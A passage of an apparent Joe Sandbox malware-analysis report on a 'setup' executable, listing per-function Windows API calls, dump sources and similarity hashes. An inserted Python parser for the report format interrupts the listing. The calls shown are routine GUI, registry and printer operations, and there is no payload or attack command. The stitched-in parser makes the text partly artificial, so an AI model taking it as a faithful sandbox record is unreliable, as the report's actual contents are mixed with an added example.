                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C21412
                                                                                                                            • Part of subcall function 00C21D8A: IsWindow.USER32(00000000), ref: 00C21D94
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 00C214B4
                                                                                                                          • GetParent.USER32(00000000), ref: 00C21704
                                                                                                                          • IsWindow.USER32(00000000), ref: 00C21719
                                                                                                                          • SendMessageW.USER32(00000000,0000004E,00000000,?), ref: 00C21751
  • Part of subcall function 00C21C56: __EH_prolog3.LIBCMT ref: 00C21C5D
• GetParent.USER32(?), ref: 00C217A0
• IsWindow.USER32(?), ref: 00C217B5
• SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C217E1
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Window$MessageParentSend$AttributesFileH_prolog3H_prolog3_
• String ID:
• API String ID: 4106875604-0
• Opcode ID: 3b5e54c0f4c55f7e792983cbc41939c4273bb5f5739a1a9d8f96ee919b734ef5
• Instruction ID: c05e5bc5ccce088cafb096a693eea6a52e8e7f75794114e2d432458710321f4c
• Opcode Fuzzy Hash: 3b5e54c0f4c55f7e792983cbc41939c4273bb5f5739a1a9d8f96ee919b734ef5
• Instruction Fuzzy Hash: 50B18BB1910529AFDB24EB60CC99BEDB77AAF94300F0441D9E409A71A1DF31AF94DF90
APIs
• CreateSolidBrush.GDI32(?), ref: 00C0E905
• FillRect.USER32(?,?,00000000), ref: 00C0E936
• DeleteObject.GDI32(00000000), ref: 00C0E93D
• CreatePen.GDI32(00000000,00000002,?), ref: 00C0EAC6
• SelectObject.GDI32(?,00000000), ref: 00C0EAD3
• Ellipse.GDI32(?,?,?,?,?), ref: 00C0EAF7
• SelectObject.GDI32(?,00000000), ref: 00C0EB02
• DeleteObject.GDI32(00000000), ref: 00C0EB09
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Object$CreateDeleteSelect$BrushEllipseFillRectSolid
• String ID:
• API String ID: 1754616435-0
• Opcode ID: 59f63eb87fca0605b04f66486863823dbf0b0227bccc683308b999f6db226365
• Instruction ID: 5330b8a0f99e58fb19ba9db96c7a83051695fea2b4ef5d860e5f9bf45dfcec8c
• Opcode Fuzzy Hash: 59f63eb87fca0605b04f66486863823dbf0b0227bccc683308b999f6db226365
• Instruction Fuzzy Hash: 17716F71918B419FC302CF38C89595BBBE5BFDA294F148B2EF485A7261E731D846CB41
APIs
• __EH_prolog3_catch.LIBCMT ref: 00C3E5CA
• EnterCriticalSection.KERNEL32(?,00000010,00C3E4F3,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057), ref: 00C3E5DB
• TlsGetValue.KERNEL32(?,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057,?,00C2DC12), ref: 00C3E5F7
• LocalAlloc.KERNEL32(00000000,00000000), ref: 00C3E660
• TlsSetValue.KERNEL32(?,00000000), ref: 00C3E69F
• LeaveCriticalSection.KERNEL32(00C087B5,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057,?,00C2DC12), ref: 00C3E6BD
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CriticalSectionValue$AllocEnterH_prolog3_catchLeaveLocal
• String ID:
• API String ID: 3140444358-0
• Opcode ID: 54e424511e03f40b1f1a179f18c350940e7978756ef664f9c67494bed6cce346
• Instruction ID: a5b0d4796560bd0b828c3e48cff4b6541b47937f02034b494941547797c8f9b7
• Opcode Fuzzy Hash: 54e424511e03f40b1f1a179f18c350940e7978756ef664f9c67494bed6cce346
• Instruction Fuzzy Hash: 3C41BF7121061A9FDB25AF29C889A6EBBB5FF54315F148029F81ADB6A1D730ED00DF90
APIs
• GlobalLock.KERNEL32(00000000), ref: 00C39571
• lstrcmpW.KERNEL32(00000000,?), ref: 00C3958A
• OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00C3959F
• DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C395BF
• GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C395C7
• GlobalLock.KERNEL32(00000000), ref: 00C395D5
• DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00C395E6
• ClosePrinter.WINSPOOL.DRV(?), ref: 00C395FE
  • Part of subcall function 00C3D4C3: GlobalFlags.KERNEL32(?), ref: 00C3D4D0
  • Part of subcall function 00C3D4C3: GlobalUnlock.KERNEL32(?), ref: 00C3D4DE
  • Part of subcall function 00C3D4C3: GlobalFree.KERNEL32(?), ref: 00C3D4EA
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
• String ID:
• API String ID: 168474834-0
• Opcode ID: 19a1cb7cba16947f5a1d9f25fee17cd0545aae2c594a69f5e624be386c20f1b9
• Instruction ID: d0b9a25c246a1891337ec4e731b2fbf65cbd014a691e31784451d7190b20df35
• Opcode Fuzzy Hash: 19a1cb7cba16947f5a1d9f25fee17cd0545aae2c594a69f5e624be386c20f1b9
• Instruction Fuzzy Hash: 7D1160B1510609FFEB226FA0DD8AEAE7EACFF04744F00052AB61695071DA71DE54EB20
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00C7019E
• ___TypeMatch.LIBVCRUNTIME ref: 00C702A9
• CallUnexpected.LIBVCRUNTIME ref: 00C70417
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CallMatchTypeUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 1206542248-393685449
• Opcode ID: 3f1493223013a40efe858b85d235a8c507ca323c382ad872561b65eec2393f7c
• Instruction ID: acd98fe31632affd484bc0241fb70a7214d933413359750625185a6a2ac571c8
• Opcode Fuzzy Hash: 3f1493223013a40efe858b85d235a8c507ca323c382ad872561b65eec2393f7c
• Instruction Fuzzy Hash: 0FB1A271800209DFCF24DFA4D8819AEBBB5FF14310F64856AF9296B212C770EA52DF91
APIs
• __EH_prolog3.LIBCMT ref: 00C3663E
• _memcpy_s.LIBCMT ref: 00C3674F
• CoTaskMemFree.OLE32(?,000000FF), ref: 00C36777
• GetParent.USER32(?), ref: 00C367DD
• SendMessageW.USER32(?,00000464,00000104,00000000), ref: 00C36806
• GetParent.USER32(?), ref: 00C3682C
• SendMessageW.USER32(?,00000465,00000104,00000000), ref: 00C36852
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: MessageParentSend$FreeH_prolog3Task_memcpy_s
• String ID:
• API String ID: 3096905456-0
• Opcode ID: c78d2f2b11f7f7143822d7d9139d07a3db3b2a3e833c16f5a8983b37719f6c22
• Instruction ID: 23d4dae180e5cdd6ffda6dd7ab51286096eaf53540717cf3f8757358679767d3
• Opcode Fuzzy Hash: c78d2f2b11f7f7143822d7d9139d07a3db3b2a3e833c16f5a8983b37719f6c22
• Instruction Fuzzy Hash: 03618C71A10116AFCB04EFA4CC95EBEB7B8BF08714F508119F561A72E1DB30AD05DB95
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Deallocate$H_prolog3_
• String ID: COPY
• API String ID: 2027147138-2066699830
• Opcode ID: 6c852837d01e5cdbd1b6f0974aaa584c6d63a5210cb5e1b8727abb5aeed365f0
• Instruction ID: f29259dae701def6d60076468fda360adf2375a510b477b035e2a63b57cd8724
• Opcode Fuzzy Hash: 6c852837d01e5cdbd1b6f0974aaa584c6d63a5210cb5e1b8727abb5aeed365f0
• Instruction Fuzzy Hash: 1D519B71D08248AFDF15EBFDC8415EDFBB5AF5A300F24812EE414F7292DA301A46AB52
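The function entries above follow one fixed layout: an "APIs" header, one bullet per call site with the API name, the module it resolves to, an argument snapshot (unknown values shown as "?") and the call-site address after "ref:", optional "Part of subcall function" bullets for calls made in a callee, then the Similarity block with the API ID, String ID and fuzzy hashes. Triage usually needs this as data rather than as a rendered page, for example to list every function in the dump that touches a given module. The parser below is an added example, not Joe Sandbox code and not part of the analysed sample; its SAMPLE text is copied from entries on this page, and its parsing rules are this example's own reading of the layout, not a documented Joe Sandbox schema.

```python
"""Parse Joe Sandbox per-function 'APIs' blocks (the listing format on this
page) into structured records. Added example: not Joe Sandbox code, not part
of the analysed sample. SAMPLE is copied from entries on this page; the
regexes are this example's own reading of the layout, not a documented schema."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Matches "• OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00C3959F",
# "• __EH_prolog3.LIBCMT ref: 00C21C5D" (no args, no comma) and
# "  • Part of subcall function 00C3D4C3: GlobalFree.KERNEL32(?), ref: 00C3D4EA".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_:=<>~]*)"   # GetParent, type_info::operator==
    r"(?:\.(?P<module>[A-Za-z0-9_.]+))?"        # USER32, WINSPOOL.DRV, LIBCMT
    r"(?:\((?P<args>[^)]*)\))?"                 # argument snapshot, '?' = unknown
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
META_LINE = re.compile(  # metadata bullets that belong to the same entry
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File|Snapshot File):"
    r"\s*(?P<value>.*?)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: Optional[str]
    args: List[str]
    ref: int                   # call-site address listed after 'ref:'
    subcall_of: Optional[int]  # callee address when the call sits in a subcall

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

    @property
    def direct_apis(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]

def parse_blocks(text: str) -> List[FunctionRecord]:
    """Every 'APIs' header opens a new entry; recognised bullets up to the next
    header attach to it, anything else ('Associated:', 'Strings', ...) is skipped."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is not None:
            m = API_LINE.match(line)
            if m:
                raw = m.group("args")
                current.calls.append(ApiCall(
                    m.group("name"), m.group("module"),
                    [a.strip() for a in raw.split(",")] if raw else [],
                    int(m.group("ref"), 16),
                    int(m.group("subfn"), 16) if m.group("subfn") else None))
            elif (m := META_LINE.match(line)):
                current.meta[m.group("key")] = m.group("value")
    return records

def calls_into(records: List[FunctionRecord], module: str) -> List[Tuple[int, ApiCall]]:
    """(entry index, call) for each direct call into `module`, e.g. WINSPOOL.DRV."""
    return [(i, c) for i, rec in enumerate(records) for c in rec.direct_apis
            if c.module and c.module.upper() == module.upper()]

def fingerprint(rec: FunctionRecord) -> Tuple[str, ...]:
    """Sorted distinct direct API names: a cheap key for matching a function
    across reports of related samples (the page's own 'API ID' is Joe Sandbox's
    richer version of the same idea)."""
    return tuple(sorted({c.name for c in rec.direct_apis}))

# Constructed input: three entries copied from this page, shortened.
SAMPLE = """\
APIs
• __EH_prolog3_catch.LIBCMT ref: 00C3E5CA
• EnterCriticalSection.KERNEL32(?,00000010,00C3E4F3,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057), ref: 00C3E5DB
• TlsGetValue.KERNEL32(?,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057,?,00C2DC12), ref: 00C3E5F7
• LeaveCriticalSection.KERNEL32(00C087B5,?,00000000,?,?,00C0842C,?,?,00C08787,00000000,?,?,?,80070057,?,00C2DC12), ref: 00C3E6BD
Similarity
• API ID: CriticalSectionValue$AllocEnterH_prolog3_catchLeaveLocal
• String ID:
• Instruction Fuzzy Hash: 3C41BF7121061A9FDB25AF29C889A6EBBB5FF54315F148029F81ADB6A1D730ED00DF90
APIs
• GlobalLock.KERNEL32(00000000), ref: 00C39571
• OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00C3959F
• DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C395BF
• ClosePrinter.WINSPOOL.DRV(?), ref: 00C395FE
  • Part of subcall function 00C3D4C3: GlobalFree.KERNEL32(?), ref: 00C3D4EA
Similarity
• API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
• String ID:
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00C7019E
• CallUnexpected.LIBVCRUNTIME ref: 00C70417
Strings
Similarity
• String ID: csm$csm$csm
"""
```

Run `parse_blocks` over a report saved as text and call `calls_into(records, "WINSPOOL.DRV")` or `fingerprint(record)` on the result; the argument snapshots are kept as the strings the report prints, so a "?" stays a "?" rather than being guessed at.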
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C20E79
                                                                                                                          • SetPixelV.GDI32(00000003,?,?,?,00000020,00C20DF3,?,00000000,00000000), ref: 00C20EF9
                                                                                                                          • SetPixelV.GDI32(00000003,?,?,?), ref: 00C20F09
                                                                                                                          • SetPixelV.GDI32(00000003,?,?,?), ref: 00C20F1C
                                                                                                                          • Ellipse.GDI32(00000001,?,?,?,?), ref: 00C20F79
                                                                                                                          • Ellipse.GDI32(00000001,?,?,?,?), ref: 00C20F92
                                                                                                                          • Ellipse.GDI32(00000001,?,?,?,?), ref: 00C20FAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EllipsePixel$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2528679965-0
                                                                                                                          • Opcode ID: 860dcee1909a40ea79fb8050d3c6a130af764175b519d422cb5dd5d360aa1bcf
                                                                                                                          • Instruction ID: e7e0c40bcec5f624aa0a726882213f3d5e01c4aa539833284b6242cca7b76afb
                                                                                                                          • Opcode Fuzzy Hash: 860dcee1909a40ea79fb8050d3c6a130af764175b519d422cb5dd5d360aa1bcf
                                                                                                                          • Instruction Fuzzy Hash: A7512B71A0011AAFCF04DFA8CD96AEEBBB5FF48300F148119F915A7291DB71A914DBA4
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 00C32965
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C32987
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C329A1
                                                                                                                          • SendMessageW.USER32(?,00000121,00000001,?), ref: 00C329C7
                                                                                                                          • SendMessageW.USER32(?,0000036A,00000000,00000000), ref: 00C329DF
                                                                                                                          • UpdateWindow.USER32(?), ref: 00C32A2C
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C32A76
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2853195852-0
                                                                                                                          • Opcode ID: eb07daf39b0217df434b611e43ef63430435a50365d33b5fa82bd44c40697dae
                                                                                                                          • Instruction ID: 7578a9242963d482e66d0effbfd4da16d9d6dd02a3f086de0479d9bab8bfd2c8
                                                                                                                          • Opcode Fuzzy Hash: eb07daf39b0217df434b611e43ef63430435a50365d33b5fa82bd44c40697dae
                                                                                                                          • Instruction Fuzzy Hash: 6B417A71A20315BFEF249BA4C849B6EBBB8FF04755F148159E861E7190DB70DE109BA0
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C3B4BB
                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 00C3B5C0
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 00C3B5DD
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C3B5FE
                                                                                                                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 00C3B619
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                                          • String ID: Software\
                                                                                                                          • API String ID: 1666054129-964853688
                                                                                                                          • Opcode ID: 5026c3837d571af8ca92634e68676cb2d19fe2eef7e48ba5b53a1b330beec897
                                                                                                                          • Instruction ID: 7624ab742a5d3eb6e1c79b0f1dff99d62ef53a1ec7c102939d96886dae411366
                                                                                                                          • Opcode Fuzzy Hash: 5026c3837d571af8ca92634e68676cb2d19fe2eef7e48ba5b53a1b330beec897
                                                                                                                          • Instruction Fuzzy Hash: 55417F7190122AABCB20EBA0DC99FEEB77CAF04314F1441A9F505A3192DB309F85DF50
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C11949
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C1199E
                                                                                                                            • Part of subcall function 00C2E424: SetBkColor.GDI32(00000000,?), ref: 00C2E440
                                                                                                                            • Part of subcall function 00C2E424: ExtTextOutW.GDI32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00C2E455
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C119E8
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C11A00
                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C11A51
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C11AAD
                                                                                                                          • PostMessageW.USER32(?,00000000,00000000), ref: 00C11AFF
                                                                                                                            • Part of subcall function 00C0F90F: __EH_prolog3.LIBCMT ref: 00C0F916
                                                                                                                            • Part of subcall function 00C0F90F: CreateCompatibleDC.GDI32(00000001), ref: 00C0F96F
                                                                                                                            • Part of subcall function 00C0F90F: CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 00C0F98D
                                                                                                                            • Part of subcall function 00C0F90F: GetBkColor.GDI32(?), ref: 00C0F9C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientCompatibleCreateRect$ColorH_prolog3$BeginBitmapH_prolog3_MessagePaintPostText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 800765946-0
                                                                                                                          • Opcode ID: 5598937d0b0cd1794fd0dcee345c17c63e04a33f5c6b28efd70d714b119e56ce
                                                                                                                          • Instruction ID: ad7449bee3a99c1cdfe1d8bd61f1b4bf649fbb853ad8659abe557bdeae6ef6af
                                                                                                                          • Opcode Fuzzy Hash: 5598937d0b0cd1794fd0dcee345c17c63e04a33f5c6b28efd70d714b119e56ce
                                                                                                                          • Instruction Fuzzy Hash: 2B515F7090126DAFDF21DBA0CD44FEEBBB9BF16304F048199F58A62151DB346E84EB21
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C2E594: GetParent.USER32(00000000), ref: 00C2E5F1
                                                                                                                            • Part of subcall function 00C2E594: GetLastActivePopup.USER32(00000000), ref: 00C2E604
                                                                                                                            • Part of subcall function 00C2E594: IsWindowEnabled.USER32(00000000), ref: 00C2E618
                                                                                                                            • Part of subcall function 00C2E594: EnableWindow.USER32(00000000,00000000), ref: 00C2E62B
                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00C2E68A
                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00C2E6A0
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00C2E6AA
                                                                                                                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00C2E6C0
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C2E74B
                                                                                                                          • MessageBoxW.USER32(?,?,?,00C1B1CF), ref: 00C2E76D
                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00C2E792
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
